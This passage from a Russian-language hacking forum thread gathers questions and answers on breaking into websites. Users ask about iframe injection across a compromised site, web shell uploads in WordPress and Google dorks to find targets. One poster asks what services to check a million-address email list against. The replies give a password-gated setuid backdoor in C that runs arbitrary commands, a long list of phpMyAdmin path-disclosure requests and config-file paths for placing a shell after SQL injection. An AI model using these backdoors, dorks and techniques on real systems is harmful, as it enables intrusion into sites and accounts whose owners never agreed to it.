Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Рутануть сервак или домены на кирилице
     
    _________________________
    #20281 kingbeef, 29 Apr 2012
    Last edited: 29 Apr 2012
  2. RusPoker74

    RusPoker74 Banned

    Joined:
    26 Feb 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А чуть поподробнее можно? )
     
  3. shellers

    shellers Banned

    Joined:
    18 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребят объясните непонятное, есть easymod в phpbb он криптует пасс через функцию crypt_ftp_pass
    http://svn2.assembla.com/svn/evilmods/2.0/quickinstall/trunk/store/easymod/admin/em_includes/em_functions.php
    И хранит его в бд, НО возникает вопрос, каким макаром тогда конектится скрипт должен быть чистый пасс гдето, нетакли? Как будет он декодировать его при подключении?
     
    #20283 shellers, 29 Apr 2012
    Last edited: 29 Apr 2012
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Должна быть прописана гдето функция декриптовки и эта вункция декриптуя пасс присваевается переменной, которая в следствии и выполняет конект!
     
    _________________________
  5. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Несколько вопросов.
    1) Как сделать так, чтобы фрейм был не только на индексе, но и на остальных разделах сайта? Например, обхватывал еще форум или админскую панель
    2) Реально ли залить шелл в WP ( версия 3.3) с правами модератора, то есть в theme_editor не пускает. Остальное вроде все есть.
     
  6. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    ответ на 1 вопрос: правь шаблон, если шаблон 1 на всех страницах где используется данный шаб будет твой фрейм.

    на второй вопрос: думаю что нет, права админа нужны
     
  7. Cock3r

    Cock3r New Member

    Joined:
    19 Jan 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    Подскажите, пожалуйста, дорк для поиска WP блогов.
     
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    "/wp-login.php"
     
  9. Cock3r

    Cock3r New Member

    Joined:
    19 Jan 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    сам-то пробовал вбивать?мусора много, такая же ситуация и с inurl:wp-content
     
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Хотя бы так
    inurl:"?author=admin"
    Человек тебе хотел помочь.
     
  11. Jakeroid

    Jakeroid Member

    Joined:
    9 May 2009
    Messages:
    199
    Likes Received:
    12
    Reputations:
    1
    А если автор не админ? Ну зарегал себе ник другой?
     
  12. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    inurl:"wp-login.php?action=register"
    inurl:"plugins/wp-forum"
    "index of /" wp-forum
    Хотя бы так... :)
     
    #20292 cat1vo, 30 Apr 2012
    Last edited: 30 Apr 2012
  13. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    такой вопрос. Есть база мыльников(1кк, микс). На что её можно чекнуть? ICQ, steam,origin, twitter, facebook чекнуты. Мб есть что ещё?
     
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    "powered by wordpress"

    же
     
  15. Jakeroid

    Jakeroid Member

    Joined:
    9 May 2009
    Messages:
    199
    Likes Received:
    12
    Reputations:
    1
    Дык, затерают же часто.
     
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Скомпилируйте суидник на FreeBSD:
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    main(int argc, char *argv[]) {
     if(argc == 3){
        if(strcmp(argv[1],"cool_pass") == 0){
           setgid(310);
           setuid(16745);
           system(argv[2]);
        }
     }
     return 0;
    }
     
  17. heJiZzZ

    heJiZzZ Member

    Joined:
    1 Jun 2009
    Messages:
    39
    Likes Received:
    18
    Reputations:
    10
    Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    попробуй подобрать для начало дефолтный путь до файла конфигов httpd.conf, в нем посмотри диру в какой сайт установлен, попробуй с нее index.php прочитать, если найдешь то пробуй заливаться в папки с изображениями или авами они часто с полными правами, что дает возможность заливаться...


    P.S: вот список дефолтных логов можешь тут взглянуть https://forum.antichat.ru/thread49775-default.html

    еще также может гугл помочь с раскрытием путей попробуй дорк такого плана
     
    _________________________
    #20298 winstrool, 30 Apr 2012
    Last edited: 30 Apr 2012
    1 person likes this.
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,182
    Likes Received:
    618
    Reputations:
    690
    ищи phpinfo
    или
    запросы которые могут привести к раскрытию путей
    Code:
    Full path disclosure :
    /sсriрts/check_lang.php
    /themes/darkblue_orange/layout.inc.php
    /index.php?lang[]=
    /index.php?target[]=
    /index.php?db[]=
    /index.php?goto[]=
    /left.php?server[]=
    /index.php?table[]=
    /server_databases.php?token=your_token&sort_by="
    /index.php?db=information_schema&token=your_token&tbl_group[]=
    /db_printview.php?db="
    /sql.php?back[]=
    libraries/string.lib.php
    libraries/storage_engines.lib.php
    libraries/sqlparser.lib.php
    libraries/sql_query_form.lib.php
    libraries/select_theme.lib.php
    libraries/select_lang.lib.php
    libraries/relation_cleanup.lib.php
    libraries/left_header.inc.php
    libraries/import.lib.php
    libraries/header_meta_style.inc.php
    libraries/grab_globals.lib.php
    libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
    libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
    libraries/display_import.lib.php
    libraries/display_export.lib.php
    libraries/display_create_table.lib.php
    libraries/display_create_database.lib.php
    libraries/db_table_exists.lib.php
    libraries/database_interface.lib.php
    libraries/common.lib.php
    libraries/check_user_privileges.lib.php
    libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
    libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
    libraries/import/sql.php
    libraries/fpdf/ufpdf.php
    libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
     
    _________________________
    1 person likes this.
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Чаще:
    /etc/conf/httpd/httpd.conf
     
Thread Status:
Not open for further replies.